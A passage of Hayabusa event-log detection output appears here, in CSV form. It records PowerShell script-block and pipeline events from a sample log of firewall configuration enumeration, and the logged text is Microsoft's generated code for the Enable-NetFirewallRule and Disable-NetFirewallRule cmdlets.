$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssocia",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.598 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.598 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.614 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", 